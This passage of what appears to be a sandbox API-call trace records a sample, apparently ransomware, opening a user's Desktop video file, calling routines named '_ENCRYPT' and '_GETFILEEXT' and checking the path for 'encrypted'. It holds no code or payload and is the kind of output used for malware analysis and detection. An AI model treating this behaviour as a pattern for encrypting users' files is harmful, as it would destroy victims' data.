lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.275] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\5em8.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0031.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=80, lpWideCharStr=0x7d8600, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi") returned 80 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.277] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.278] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.278] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.278] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.278] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.278] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.279] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.279] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.279] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.279] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.279] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.279] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.280] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.280] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.280] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x7f98f740, ftLastWriteTime.dwHighDateTime=0x1d5c185, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5EM8.avi", cAlternateFileName="")) returned 0x7c20c0 [0031.280] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.280] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5336bc70, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x7f98f740, ftLastAccessTime.dwHighDateTime=0x1d5c185, ftLastWriteTime.dwLowDateTime=0x7f98f740, ftLastWriteTime.dwHighDateTime=0x1d5c185, nFileSizeHigh=0x0, nFileSizeLow=0x123c4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5EM8.avi", cAlternateFileName="")) returned 0x7c20c0 [0031.280] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.280] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 